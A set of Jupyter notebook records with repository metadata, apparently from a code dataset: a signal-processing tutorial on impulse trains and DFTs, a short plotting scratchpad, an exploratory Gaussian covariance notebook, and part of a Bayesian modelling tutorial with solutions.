4))\nfdom.plot([0,np.max(dft_freqs)], [0,0], color='grey')\nfdom.scatter(dft_freqs, phase_impulse)\nfdom.set_xlabel(\"Frequency (Hz)\")\nfdom.set_ylabel(\"Phase angle (radians)\")\n\n## You should see that magnitudes for all the bins is one (you might need to change the y axis limit)", "_____no_output_____" ] ], [ [ "### Exercise: \n**Question**\n\n* What does the magnitude spectrum show? \n* What does the phase spectrum show? \n* How might this be useful for modelling the vocal source? \n", "_____no_output_____" ], [ "### Notes", "_____no_output_____" ], [ "## 2 From Impulse to Impulse Train\n\nThe DFT analysis above showed us that a single impulse can potentially be linked to any frequency! \nThis might not seem very useful at first, but actually we can use this to start making a model of the voice source that we can shape in the way we want. The first thing is to add a **periodic** element. To do this we'll make an **impulse train**: a sequence `x` with value 1 every `n_period` samples, and zero otherwise. \n\nWe should note though that not all speech sounds are periodic. For example, fricatives like /s/ and /sh/ are more like white noise. We'll have to model these in other ways. \n\nNow let's make an impulse train with `N=64` samples, a sampling rate of `f_s=64` samples per second, and an impulse period `n_period=4`:", "_____no_output_____" ] ], [ [ "## Let's keep the number of samples and the sampling rate the same as above\nN=64\nf_s = 64\nt_s = 1/f_s\nnsteps = np.array(range(N))\ntime_steps = t_s * nsteps\n\n## Now let's create an impulse response:\n\n# create a sequence of length N but all zeros\nx_impulse_train = np.zeros(N)\n\n# set the impulse period to be 1 impulse every n_period samples\nn_period = 4\n\n# Find the indices which will carry the impulses, i.e. every n_period-th one starting from 0 to N\nimpulse_indices = np.arange(0, N, n_period)\n\n## Set the impulses\nx_impulse_train[impulse_indices] = 1\n\n## Plot it!\nfig, timedom = plt.subplots(figsize=(16, 4))\ntimedom.scatter(time_steps, x_impulse_train, color='magenta')\ntimedom.plot(time_steps, x_impulse_train, color='magenta')\ntimedom.set_ylabel(\"Amplitude\")\ntimedom.set_xlabel(\"Time (s)\")\ntimedom.set_title(\"An impulse train: an impulse every %d samples\" % n_period)", "_____no_output_____" ] ], [ [ "You should see a repeated sequence over 1 second where every 4th sample has amplitude 1, and all the rest have value 0. \n\n### DFT of an impulse train\n\nNow let's look at the DFT of this impulse train.", "_____no_output_____" ] ], [ [ "## Get the DFT outputs: magnitude and phase\nmag_impulse_train, phase_impulse_train = get_dft_mag_phase(x_impulse_train, N)\n\n## Get the DFT output frequencies, for plotting\ndft_freqs = get_dft_freqs_all(f_s, N)\n\n## plot the magnitudes, but this time we're going to need to zoom in a bit on the y-axis: \nfig, fdom = plt.subplots(figsize=(16, 4))\nfdom.set(ylim=(-1, N), xlim=(-1, N/2))\nfdom.scatter(dft_freqs, mag_impulse_train)\nfdom.set_xlabel(\"Frequency (Hz)\")\nfdom.set_ylabel(\"Magnitude\")\nfdom.set_title(\"Impulse Train Magnitude Response (First N/2 DFT outputs)\")\n\n## Plot the phases\nfig, fdom = plt.subplots(figsize=(16, 4))\nfdom.set(ylim=(-4,4), xlim=(-1, N/2))\nfdom.scatter(dft_freqs, phase_impulse_train)\nfdom.set_xlabel(\"Frequency (Hz)\")\nfdom.set_ylabel(\"Phase (radians)\")\nfdom.set_title(\"Impulse Train Phase Response (First N/2 DFT outputs)\")\n", "_____no_output_____" ] ], [ [ "The magnitude (top) plot indicates that the impulse train has frequency components at multiples of 8 Hz.\nThe phase plot (bottom) doesn't show a phase shift. This also makes sense since our input sequence started with a 1, so acts like cosine with no phase shift. \n\n**Note** We only plotted the first $N/2$ DFT outputs since we saw previously that DFT outputs are symmetrical around $N/2$. \n", "_____no_output_____" ], [ "### Exercise \n\n* What the relationship between the non-zero magnitudes in the example above? \n * What's the fundamental frequency of the impulse train? \n* What DFT output frequencies have non-zero magnitudes if you you change `n_period` to `8`? \n* What happens when the frequency doesn't exactly match one of the DFT outputs? \n * e.g. try `n_period = 5`", "_____no_output_____" ], [ "### Notes", "_____no_output_____" ], [ "## 3 Impulse train fundamental frequency\n\nSince we eventually want to model the vocal source, we want to be able to create impulse trains with specific fundamental frequencies ($F_0$). As usual for digital signal processing, the actual sequence we generate to represent this will depend on the sample rate. \n\nThe following cell defines a function to create impulse trains varying the sample rate, desired frequency, and number of samples. We'll use this later to see how this interacts with different types of filters. \n", "_____no_output_____" ] ], [ [ "def make_impulse_train(sample_rate, frequency, n_samples): \n # make an arrange of n_samples, all zeros to start\n x = np.zeros(n_samples)\n \n # Determine where the impulses go based on the sample rate\n # The time between samples: sample_time = 1/sample_rate\n \n #A frequency of f cycles/second means the wavelength=1/f\n # So samples_per_cycle = wavelength/t_s = 1/frequency / 1/sample_rate = sample_rate/frequency\n \n ## We need to round to the nearest integer\n samples_per_cycle = round(sample_rate/frequency)\n \n # Set indices for impulses\n impulse_positions = np.arange(0, n_samples, samples_per_cycle)\n #print(\"impulse_positions:\", impulse_positions)\n # set the impulses\n x[impulse_positions] = 1\n \n ## return the time steps associated with the impulse train samples\n nsteps = np.array(range(n_samples))\n time_steps = (1/sample_rate) * nsteps \n \n return x, time_steps", "_____no_output_____" ], [ "## Set the number of samples and sampling rate\nN = 64\nf_s = 64\n\n## set our desired impulse train frequency\nfreq = 12\n\nx_impulse_train, time_steps = make_impulse_train(sample_rate=f_s, frequency=freq, n_samples=N)\n\nfig, timedom = plt.subplots(figsize=(16, 4))\ntimedom.scatter(time_steps, x_impulse_train, color='magenta')\ntimedom.plot(time_steps, x_impulse_train, color='magenta')\n\n", "_____no_output_____" ] ], [ [ "### Exercise\n\nTry changing the frequency of the impulse train. \n* What's the highest frequency you can actually generate if the sample rate equals 64? \n", "_____no_output_____" ], [ "### Notes", "_____no_output_____" ], [ "### Next: Filters\n\nNow that we've made a (sort of) source, we want to create a filter that can alter input (impulse train) so that the output looks the way we want it it. In class you've seen two types of filters: \n\n* [Finite Impluse Response (FIR) filters](./signals-2-2-fir-filters.ipynb)\n* [Infinite Impluse Response (IIR) filters](./signals-2-3-iir-filters.ipynb)\n\nBoth perform a transform on an input sequence $x[n]$ to give us some desired output sequence $y[n]$. The difference between the two types of filters is basically whether we only use the inputs to derive each output $y[n]$ (FIR), or whether we also use previous outputs (IIR). \n\nThe next notebook illustrates some of the properties of [FIR filters](./signals-2-2-fir-filters.ipynb). ", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ] ]
e72fc8544bcb967246d4150b6db0f1b75f765db6
1,940
ipynb
Jupyter Notebook
_site/week06/Untitled.ipynb
UIUC-iSchool-DataViz/spring2019online
e586cfafd90d6de38c308bf8ad072c9a4ed8485b
[ "BSD-3-Clause" ]
1
2019-08-11T04:03:24.000Z
2019-08-11T04:03:24.000Z
_site/week06/Untitled.ipynb
UIUC-iSchool-DataViz/spring2019online
e586cfafd90d6de38c308bf8ad072c9a4ed8485b
[ "BSD-3-Clause" ]
1
2020-03-02T00:11:33.000Z
2020-03-02T00:11:33.000Z
_site/week06/Untitled.ipynb
UIUC-iSchool-DataViz/spring2019online
e586cfafd90d6de38c308bf8ad072c9a4ed8485b
[ "BSD-3-Clause" ]
1
2020-03-09T16:13:34.000Z
2020-03-09T16:13:34.000Z
18.47619
163
0.518557
[ [ [ "import bqplot", "_____no_output_____" ], [ "import bqplot.pyplot as plt", "_____no_output_____" ], [ "plt.plot([5,5,6],[1,2,3])\nplt.show()", "_____no_output_____" ], [ "import numpy as np", "_____no_output_____" ], [ "np.random.randint(0,10,5)", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code" ] ]
e72fd26af6bfcd1120f701e2356862b70af119dc
312,983
ipynb
Jupyter Notebook
gaussian_playing.ipynb
muatik/machine-learning-examples
41f24cb168a7be1a77cf369cc508849552c8072b
[ "MIT" ]
17
2017-09-18T11:24:39.000Z
2021-02-21T11:09:13.000Z
gaussian_playing.ipynb
muatik/dm
41f24cb168a7be1a77cf369cc508849552c8072b
[ "MIT" ]
null
null
null
gaussian_playing.ipynb
muatik/dm
41f24cb168a7be1a77cf369cc508849552c8072b
[ "MIT" ]
11
2017-08-01T14:04:24.000Z
2022-02-13T10:50:52.000Z
463.678519
94,998
0.930619
[ [ [ "import numpy as np\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport seaborn as sns\nsns.set(color_codes=True)\n\n%matplotlib inline", "_____no_output_____" ], [ "data1 = np.random.normal(20, 7, size=150)\ndata2 = np.random.normal(40, 10, size=150)\nsns.jointplot(x=data1, y=data2,kind=\"kde\");", "_____no_output_____" ], [ "data1 = np.random.normal(20, 6, size=20)\ndata1 = np.sort(data1)\ndata2 = np.sort(data1) + 9.9\n\n# data1 = np.linspace(-5, 5, 40)\n# print(data1)\n# data1 = np.sort(np.random.normal(20, 3, size=240))\n# print(data1)\n# data2 = data1\ndef dd(data1, data2):\n from matplotlib import pylab\n x = np.linspace(-5, 5, 200)\n y = x\n X, Y = np.meshgrid(x, y)\n \n# X, Y = np.meshgrid(data1, data2)\n Z = pylab.bivariate_normal(X, Y)\n print(X)\n \n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.plot_surface(X, Y, Z, cmap= \"OrRd\")\ndd(bins1, bins1)", "[[-5. -4.94974874 -4.89949749 ..., 4.89949749 4.94974874 5. ]\n [-5. -4.94974874 -4.89949749 ..., 4.89949749 4.94974874 5. ]\n [-5. -4.94974874 -4.89949749 ..., 4.89949749 4.94974874 5. ]\n ..., \n [-5. -4.94974874 -4.89949749 ..., 4.89949749 4.94974874 5. ]\n [-5. -4.94974874 -4.89949749 ..., 4.89949749 4.94974874 5. ]\n [-5. -4.94974874 -4.89949749 ..., 4.89949749 4.94974874 5. ]]\n" ], [ "# data = [4, 1, 4,5, 6, 4, 5, 2, 4, 5, 4, 4, 3, 3, 6,3,3,3, 4, 5, 3, 6, 4, 3, 4, 2, 5, 0,4, 3, 4, 5, 5, 3, 4, 5, 4, 3, 5, 6, 3, 4, 5, 5, 8, 7, 3, 5, 6, 4, 5]\ndef pre_calc(data):\n mean = np.sum(data) / len(data)\n variance = np.sum(np.power(np.subtract(data, mean), 2)) / len(data)\n sigma = np.sqrt(variance)\n# print(\"mean: \", mean, np.mean(data))\n# print(\"variance: \", variance, np.var(data))\n# print(\"standard deviation: \", sigma, np.std(data))\n return mean, variance, sigma\n\ndef cov(data1, data2):\n mean1, variance1, sigma1 = pre_calc(data1)\n mean2, variance2, sigma2 = pre_calc(data2)\n return np.sum((data1-mean1) * (data2-mean2)) / len(data1)\n\nprint(cov(data1, data2))\nnp.cov(data1, data2)", "15.6858339625\n" ], [ "def plot_raw_data(data, mean, sigma):\n mean, variance, sigma = pre_calc(data)\n # plotting data\n plt.ylim(-30, 70)\n plt.scatter(x=range(len(data1)), y=data)\n\n # plotting mean\n plt.plot(range(len(data)), [mean] * len(data), \"r-\")\n\n # plotting standard deviation\n plt.plot(range(len(data)), [sigma + mean] * len(data), \"g-\")\n plt.plot(range(len(data)), [mean - sigma] * len(data), \"g-\")", "_____no_output_____" ], [ "mean1, variance1, sigma1 = pre_calc(data1)\nmean2, variance2, sigma2 = pre_calc(data2)\n\nplt.figure(figsize=(12,4))\nplt.subplot(121)\nplot_raw_data(data1, mean1, sigma1)\nplt.subplot(122)\nplot_raw_data(data2, mean2, sigma2)", "_____no_output_____" ], [ "def plot_hist(data, mean, sigma):\n count, bins, ignored = plt.hist(data, len(data)//5, normed=True)\n plt.plot(\n bins, \n 1/(sigma*np.sqrt(2 * np.pi)) * np.exp(-(bins-mean)**2 / (2*sigma**2)), \n linewidth=2,color=\"r\")\n\nplt.figure(figsize=(12,4))\nplt.subplot(121)\nplot_hist(data1, mean1, sigma1)\nplt.subplot(122)\nplot_hist(data2, mean2, sigma2)", "_____no_output_____" ], [ "mu, sigma = 10, 15.0 # mean and standard deviation\ndata = np.random.normal(mu, sigma, 1000)", "_____no_output_____" ], [ "count, bins, ignored = plt.hist(data, 50, normed=True)\nplt.plot(\n bins, \n 1/(sigma*np.sqrt(2 * np.pi)) * np.exp(-(bins-mu)**2 / (2*sigma**2)), \n linewidth=2,color=\"r\")", "_____no_output_____" ], [ "count1, bins1, ignored2 = plt.hist(data1, len(data1)//5, normed=True)\ncount1, bins2, ignored2 = plt.hist(data2, len(data2)//5, normed=True)", "_____no_output_____" ], [ "x = np.mat([7.0, 8]).T\nm = np.mat([5, 5.0]).T\ns = np.mat(np.diag((1,1.0)))\nprint(x)\nprint(m)\nprint(s)", "[[ 7.]\n [ 8.]]\n[[ 5.]\n [ 5.]]\n[[ 1. 0.]\n [ 0. 1.]]\n" ], [ "(x - m).T ", "_____no_output_____" ], [ "s.I", "_____no_output_____" ], [ "(x - m).T * s.I", "_____no_output_____" ], [ "(x - m).T * s.I * (x - m)", "_____no_output_____" ], [ "s = np.mat(np.diag((1,1.0)))\ns[0] = [1.0, 1]\ns[1] = [0, 1.0]\n\nprint(s.I)\nprint(np.exp((x - m).T * s.I * (x - m)))", "[[ 1. -1.]\n [ 0. 1.]]\n[[ 1096.63315843]]\n" ], [ "# x1 = np.array([1.0, 2, 2, 3, 3, 3, 3, 4, 5, 4, 4, 4, 4, 4, 4, 4, 5, 5, 5, 8, 13, 14, 5, 16])\n# x2 = np.array([1.0, 1, 2, 2, 3, 3, 2, 3, 2, 5, 4, 7, 4, 4, 4, 4, 5, 5, 5, 9, 11, 12, 5, 15])\nxa = np.array([1.0, 2, 2, 3, 3, 3, 4,4,4,4,5,5,5,6,6,17, 9, 6, 7, 3])\nxb = np.array([1.0, 2, 2.1, 3, 5.2, 3, 4,4,4,4,5,5,7,8,9,18, 9, 6, 7, 3]) \nprint(x1)\nsigma = np.cov(xa, xb)\nprint(sigma)\nsns.jointplot(x=xa, y=xb, kind=\"kde\")\nsns.jointplot(x=xa, y=xb, kind=\"reg\")", "[ 1. 2. 2. 3. 3. 3. 4. 4. 4. 4. 5. 5. 5. 6. 6.\n 17.]\n[[ 11.62894737 12.30342105]\n [ 12.30342105 13.90134211]]\n" ], [ "m_a = np.mean(xa)\nm_b = np.mean(xb)\nprint(m_a, m_b)", "4.95 5.465\n" ], [ "x_b = 10\nm2_a = m_a + sigma[0][1] * np.mat(sigma[1][1]).I * (x_b - m_b)\nsigma2_a = sigma[0][0] - sigma[0][1] * np.mat(sigma[1][1]).I * sigma[1][0]\nprint(m2_a, sigma2_a)", "[[ 8.96371422]] [[ 0.73977074]]\n" ], [ "variance_a = np.power(sigma2_a, 2)\n1/np.sqrt(2*np.pi * variance_a ) * np.exp(-1.0/2*variance_a )", "_____no_output_____" ], [ "1/np.sqrt(2 * np.pi * sigma2_a) * np.exp(-1.0/2 * )", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
e72fdc8cc544e44aec53e5036d9d75dc52cca8d1
736,940
ipynb
Jupyter Notebook
tutorials/Bayes/TA_solutions/BayesDay_Tutorial_4_solutions.ipynb
sanchobarriga/course-content
a7cbe0fa40dee200bd964b349e685513bb9f71c4
[ "CC-BY-4.0" ]
1
2020-06-13T20:03:27.000Z
2020-06-13T20:03:27.000Z
tutorials/Bayes/TA_solutions/BayesDay_Tutorial_4_solutions.ipynb
sanchobarriga/course-content
a7cbe0fa40dee200bd964b349e685513bb9f71c4
[ "CC-BY-4.0" ]
1
2020-06-22T22:57:03.000Z
2020-06-22T22:57:03.000Z
tutorials/Bayes/TA_solutions/BayesDay_Tutorial_4_solutions.ipynb
sanchobarriga/course-content
a7cbe0fa40dee200bd964b349e685513bb9f71c4
[ "CC-BY-4.0" ]
1
2021-08-06T08:05:01.000Z
2021-08-06T08:05:01.000Z
668.729583
309,928
0.944564
[ [ [ "## Neuromatch Academy 2020 -- Bayes Day (dry run)\n# Tutorial 4 - Marginalization & Fitting to data\n\nPlease execute the cell below to initialize the notebook environment", "_____no_output_____" ] ], [ [ "# @title\nimport time # import time \nimport numpy as np # import numpy\nimport scipy as sp # import scipy\nimport math # import basic math functions\nimport random # import basic random number generator functions\n\nimport matplotlib.pyplot as plt # import matplotlib\nimport matplotlib as mpl\nfrom IPython import display \nfrom scipy.optimize import minimize \n\nfig_w, fig_h = (6, 4)\nplt.rcParams.update({'figure.figsize': (fig_w, fig_h)})\n#plt.style.use('ggplot')\nmpl.rc('figure', max_open_warning = 0)\n\n%matplotlib inline\n%config InlineBackend.figure_format = 'retina'\n\ndef my_gaussian(x_points, mu, sigma):\n \"\"\"\n Returns un-normalized Gaussian estimated at points `x_points`, with parameters: `mu` and `sigma`\n \n Args :\n x_points (numpy arrays of floats)- points at which the gaussian is evaluated\n mu (scalar) - mean of the Gaussian\n sigma (scalar) - std of the gaussian\n\n Returns: \n un-normalized Gaussian (i.e. without constant) evaluated at `x`\n \"\"\"\n return np.exp(-(x_points-mu)**2/(2*sigma**2))\n\ndef moments_myfunc(x_points, function):\n \"\"\"\n DO NOT EDIT THIS FUNCTION !!!\n\n Returns the mean, median and mode of an arbitrary function\n\n Args : \n x_points (numpy array of floats) - x-axis values\n function (numpy array of floats) - y-axis values of the function evaluated at `x_points`\n\n Returns:\n (tuple of 3 scalars): mean, median, mode\n \"\"\"\n \n # Calc mode of arbitrary function\n mode = x_points[np.argmax(function)]\n\n # Calc mean of arbitrary function\n mean = np.sum(x_points * function)\n\n # Calc median of arbitrary function\n cdf_function = np.zeros_like(x_points)\n accumulator = 0\n for i in np.arange(x.shape[0]):\n accumulator = accumulator + function[i]\n cdf_function[i] = accumulator\n idx = np.argmin(np.abs(cdf_function - 0.5))\n median = x_points[idx]\n\n return mean, median, mode", "_____no_output_____" ] ], [ [ "---\n\n### Tutorial objectives\n \nIn this notebook we'll have a look at computing the Marginalization Matrix and the Marginal in order to perform model inversion (i.e.: recovering the model parameters given a participant's data). \n\nThe generative model will be the same Bayesian model we have been using in Tutorial 3 (Mixture of Gaussian Prior and Gaussian Likelihood).\n", "_____no_output_____" ], [ "---\n### EXERCISE 1: Mixture of Gaussian prior\n \nSimilarly to Tutorial 2, we now want to create a prior matrix using a mixture of gaussians prior.\n\n**Suggestions**\n\nUsing the equation for the un-normalised Gaussian `my_gaussian`\n* Generate a Gaussian with mean 0 and standard deviation 0.5\n* Generate another Gaussian with mean 0 and standard deviation 10\n* Combine the two Gaussians to make a new prior by mixing the two Gaussians with mixing parameter alpha = 0.05. Make it such that the peakier Gaussian has 95% of the weight (don't forget to normalize afterwards)\n* This will be the first row of your prior matrix\n* Now repeat (hint: use np.tile) that row prior to make a matrix of 1000 (i.e. `hypothetical_stim.shape[0]`) row-priors.\n* Plot the matrix using the function `plt.matshow` already pre-written and commented-out in your script", "_____no_output_____" ] ], [ [ "hypothetical_stim = np.linspace(-8,8,1000)\nx = np.arange(-10,10,0.1)\n\n##################\n## Insert your code here to:\n## - Generate a mixture of gaussian prior with mean 0 and std 0.5 and 10 respectively\n## - Tile that row prior in order to make a matrix of 1000 row priors\n## (Hint: use np.tile() and np.reshape())\n## - Plot the Prior Matrix using the code snippet commented-out below\n##################\n\n# fig = plt.figure(figsize=(15,15))\n# ax = fig.add_subplot(111)\n# ax.imshow(prior_matrix)\n# ax.set_xlabel('x')\n# ax.set_title('Prior Matrix: p(x)')\n# ax.set_ylabel('Repetitions')\n# ax.set_aspect('auto')", "_____no_output_____" ], [ "######\n## Solution\n######\nhypothetical_stim = np.linspace(-8,8,1000)\nx = np.arange(-10,10,0.1)\n\nalpha=0.05\nprior_mean = 0\nprior_sigma1 = 0.5\nprior_sigma2 = 3\nprior1 = my_gaussian(x, prior_mean, prior_sigma1)\nprior2 = my_gaussian(x, prior_mean, prior_sigma2)\n\nprior_combined = (1-alpha) * prior1 + (alpha * prior2) \nprior_combined = prior_combined / np.sum(prior_combined)\n\nprior_matrix = np.tile(prior_combined, hypothetical_stim.shape[0]).reshape((hypothetical_stim.shape[0],-1))\n\nfig = plt.figure(figsize=(15,15))\nax = fig.add_subplot(111)\nax.imshow(prior_matrix)\nax.set_xlabel('x')\nax.set_title('Prior Matrix: p(x)')\nax.set_ylabel('Repetitions for different hypothetical stimuli')\nax.set_aspect('auto')", "_____no_output_____" ] ], [ [ "---\n### EXERCISE 2: Implement a Likelihood Matrix\n \nWe now want to create a Likelihood matrix that is made up of a Gaussian on each row of the matrix. Each row represents a different hypothetically presented stimulus with a different stimulus offset (i.e. a different likelihood mean).\n\n**Suggestions**\n\n Using the equation for the un-normalised Gaussian `my_gaussian` and the values in `hypothetical_stim`:\n* Create a Gaussian likelihood with mean varying from `hypothetical_stim`, keeping $\\sigma$ constant at 1.\n* Each Likelihood with a different mean will make up a different row-likelihood of your matrix, such that you end up with a Likelihood matrix made up of 1000 row-Gaussians with different means.\n* Plot the matrix using the function `plt.matshow` already pre-written and commented-out in your script", "_____no_output_____" ] ], [ [ "likelihood_matrix = np.zeros_like(prior_matrix)\n\n##################\n## Insert your code here to:\n## - Generate a likelihood matrix using `my_gaussian` function, with sigma = 1,\n## and varying the mean using `hypothetical_stim` values.\n## - Plot the Prior Matrix using the code snippet commented-out below\n##################\n\n# fig = plt.figure(figsize=(15,15))\n# ax = fig.add_subplot(111)\n# ax.imshow(likelihood_matrix)\n# ax.set_xlabel('x')\n# ax.set_title('Likelihood Matrix : p(x_tilde|x)')\n# ax.set_ylabel('x_tilde : Brain representation of x')\n# ax.set_aspect('auto')", "_____no_output_____" ], [ "#####\n## Solution\n#####\n\nlikelihood_matrix = np.zeros_like(prior_matrix)\n\nfor i_likelihood in np.arange(hypothetical_stim.shape[0]):\n likelihood_matrix[i_likelihood,:] = my_gaussian(x, hypothetical_stim[i_likelihood], 1)\n likelihood_matrix[i_likelihood,:] = likelihood_matrix[i_likelihood,:] / np.sum(likelihood_matrix[i_likelihood,:])\n\nfig = plt.figure(figsize=(15,15))\nax = fig.add_subplot(111)\nax.imshow(likelihood_matrix)\nax.set_xlabel('x')\nax.set_title('Likelihood Matrix : p(x_tilde|x)')\nax.set_ylabel('x_tilde : Brain representation of x')\nax.set_aspect('auto')", "_____no_output_____" ] ], [ [ "---\n### EXERCISE 3: Implement the Posterior Matrix\n \nWe now want to create the Posterior matrix. To do so, we will compute the posterior using *Bayes rule* for each trial (i.e. row_wise).\n\nThat is, each row of the posterior matrix will be the posterior resulting from the multiplication of the prior and likelihood of the equivalent row.\n\nMathematically:\n\n\\begin{eqnarray}\n Posterior\\left[i, :\\right] \\propto Likelihood\\left[i, :\\right] \\odot Prior\\left[i, :\\right]\n\\end{eqnarray}\n\nwhere $\\odot$ represent the [Hadamard Product](https://en.wikipedia.org/wiki/Hadamard_product_(matrices)) (i.e. the element_wise multiplication) of the Prior and Likelihood row vectors `i` from the matrix.\n\n**Suggestions**\n\n* For each row (trial) of the Prior and Likelihood matrix, calculate posterior and fill in the Posterior matrix, such that each row of the Posterior matrix is represent the posterior for a different trial.\n* Plot the matrix using the function `plt.matshow` already pre-written and commented-out in your script", "_____no_output_____" ] ], [ [ "posterior_matrix = np.zeros_like(likelihood_matrix)\n\n###############################################################################\n## Insert your code here to:\n## For each row of the Prior & Likelihood Matrices, calculate the resulting posterior \n## Fill the Posterior Matrix with the row_posterior\n## Plot the Posterior Matrix using the code snippet provided below\n###############################################################################\n\n# fig = plt.figure(figsize=(15,15))\n# ax = fig.add_subplot(111)\n# ax.imshow(posterior_matrix)\n# ax.set_xlabel('x')\n# ax.set_title('Posterior Matrix : p(x | x_tilde)')\n# ax.set_ylabel('x_tilde')\n# ax.set_aspect('auto')", "_____no_output_____" ], [ "######\n## Solution\n######\n\nposterior_matrix = np.zeros_like(likelihood_matrix)\n\nfor i_posterior in np.arange(posterior_matrix.shape[0]):\n posterior_matrix[i_posterior,:] = np.multiply(prior_matrix[i_posterior,:], likelihood_matrix[i_posterior,:])\n posterior_matrix[i_posterior,:] = posterior_matrix[i_posterior,:] / np.sum(posterior_matrix[i_posterior,:])\n\nfig = plt.figure(figsize=(15,15))\nax = fig.add_subplot(111)\nax.imshow(posterior_matrix)\nax.set_xlabel('x')\nax.set_title('Posterior Matrix : p(x | x_tilde)')\nax.set_ylabel('x_tilde : Brain representation of x')\nax.set_aspect('auto')", "_____no_output_____" ] ], [ [ "---\n### EXERCISE 4: Implement the Binary Decision Matrix\n \nWe now want to create the a Binary Decision Matrix. To do so, we will scan the Posterior matrix (i.e. row_wise), and set the matrix cell to 1 at the mean of the row posterior.\n\n\nThis, effectively encodes the *decision* that a participant may make on a given trial (i.e. row). In this case, the modelled decision rule is to take the mean of the posterior on each trial (use the function `moments_myfunc()` provided to calculate the mean of the posterior).\n\n**Suggestions**\n* For each row (trial) of the Posterior matrix, calculate the mode of the posterior, and set the corresponding cell of the Binary Decision Matrix to 1. (e.g. if the mode of the posterior is at position 0, then set the cell with x_column == 0 to 1).\n* Plot the matrix using the function `plt.matshow` already pre-written and commented-out in your script", "_____no_output_____" ] ], [ [ "binary_decision_matrix = np.zeros_like(posterior_matrix)\n\n###############################################################################\n## Insert your code here to:\n## Create a matrix of the same size as the Posterior matrix and fill it with zeros (Hint: use np.zeros_like())\n## For each row of the Posterior Matrix, calculate the mean of the posterior using the function povided `moments_myfunc()`, and set the corresponding cell of the Binary Decision Matrix to 1. \n## Plot the Posterior Matrix using the function `plt.pcolor` and the code snippet provided below\n###############################################################################\n\n# fig = plt.figure(figsize=(15,15))\n# ax = fig.add_subplot(111)\n# ax.imshow(binary_decision_matrix)\n# ax.set_xlabel('x_tilde')\n# ax.set_title('Binary Decision Matrix : x_hat = mean(x_tilde)')\n# ax.set_ylabel('x_hat')\n# ax.set_aspect('auto')", "_____no_output_____" ], [ "############\n# Solution\n############\nbinary_decision_matrix = np.zeros_like(posterior_matrix)\n\nfor i_posterior in np.arange(posterior_matrix.shape[0]):\n mean, _, _ = moments_myfunc(x, posterior_matrix[i_posterior,:])\n idx = np.argmin(np.abs(x - mean))\n binary_decision_matrix[i_posterior,idx] = 1 \n\nfig = plt.figure(figsize=(15,15))\nax = fig.add_subplot(111)\nax.imshow(binary_decision_matrix)\nax.set_xlabel('x_tilde')\nax.set_title('Binary Decision Matrix : x_hat = mean(x_tilde)')\nax.set_ylabel('x_hat')\nax.set_aspect('auto')", "_____no_output_____" ] ], [ [ "---\n### EXERCISE 5: Implement the Input Matrix\n \nWe now want to create the Input Matrix from the true presented stimulus. That is, we will now create a Gaussian centered around the true presented stimulus, with sigma = 1. and repeat that gaussian distribution across x values. That is we want to make a *Column* gaussian centered around the true presented stimulus, and repeat this *Column* Gaussian across all values of the x-axis matrix.\n\nThis, effectively encodes the distribution of the true stimulus (one single simulus) for that a participant on a given trial. \n\n**Suggestions**\n\nAssume the true stimulus is presented at direction -2.5\n* Create a Gaussian likelihood with mean = -2.5 with $\\sigma$ constant at 1.\n* Make this the first column of your Matrix and repeat that *column* Gaussian to fill in the True_Presented_Stimulus Matrix.\n* Plot the matrix using the function `plt.matshow` already pre-written and commented-out in your script", "_____no_output_____" ] ], [ [ "input_matrix = np.zeros_like(posterior_matrix)\n\n##################\n## Insert your code here to:\n## - Generate a gaussian centered on the true stimulus -2.5 with sigma = 1\n## - Tile that column input Gaussian in order to complete the matrix\n## (Hint: use np.tile() and np.reshape())\n## - Plot the Matrix using the code snippet commented-out below\n##################\n\n# fig = plt.figure(figsize=(15,15))\n# ax = fig.add_subplot(111)\n# ax.imshow(input_matrix)\n# ax.set_xlabel('x')\n# ax.set_title('Input Matrix: p(x_tilde | x = -2.5)')\n# ax.set_ylabel('x_tilde')\n# ax.set_aspect('auto')", "_____no_output_____" ], [ "############\n# Solution\n############\ninput_matrix = np.zeros_like(posterior_matrix)\n\nfor i in np.arange(x.shape[0]):\n input_matrix[:, i] = my_gaussian(hypothetical_stim, -2.5, 1)\n input_matrix[:, i] = input_matrix[:, i] / np.sum(input_matrix[:, i])\n\nfig = plt.figure(figsize=(15,15))\nax = fig.add_subplot(111)\nax.imshow(input_matrix)\nax.set_xlabel('x')\nax.set_title('Input Matrix: p(x_tilde | x = -2.5)')\nax.set_ylabel('x_tilde')\nax.set_aspect('auto')", "_____no_output_____" ] ], [ [ "---\n### EXERCISE 5: Implement the Marginalization Matrix\n \nWe now want to compute the Marginalization Matrix from the true presented stimulus, and our Binary decision matrix over hypothetical stimulus inputs. \n\nMathematically, this means that we want to compute:\n\n\\begin{eqnarray}\n Marginalization Matrix = Input Matrix \\odot Binary Matrix\n\\end{eqnarray}\n\n\\begin{eqnarray}\n Marginal = \\int_{x} Marginalization Matrix\n\\end{eqnarray}\n\nwhere $\\odot$ represent the [Hadamard Product](https://en.wikipedia.org/wiki/Hadamard_product_(matrices)) (i.e. the element_wise multiplication) of the Input matrix and Binary matrix.\n\n**Suggestions**\n\n* For each row of the Input and Binary matrix, calculate product of the two and fill in the Marginal matrix.\n* Plot the matrix using the function `plt.matshow` already pre-written and commented-out in your script\n* Calcualte and plot the Marginal over `x` using the code snippet commented out in your script\n - Note how the limitations of numerical integration create artifacts on your marginal ", "_____no_output_____" ] ], [ [ "marginalization_matrix = np.zeros_like(posterior_matrix)\n\n###############################################################################\n## Insert your code here to:\n## Compute the Marginalization matrix by multiplying pointwise the Binary decision matrix over hypothetical stimuli and the Input Matrix\n## Compute the Marginal from the Marginalization matrix by summing over x (hint: use np.sum())\n## Plot the Marginalization Matrix and the resulting Marginal using the code snippet provided below\n###############################################################################\n\n# fig = plt.figure(figsize=(15,15))\n# ax = fig.add_subplot(111)\n# ax.imshow(marginalization_matrix)\n# 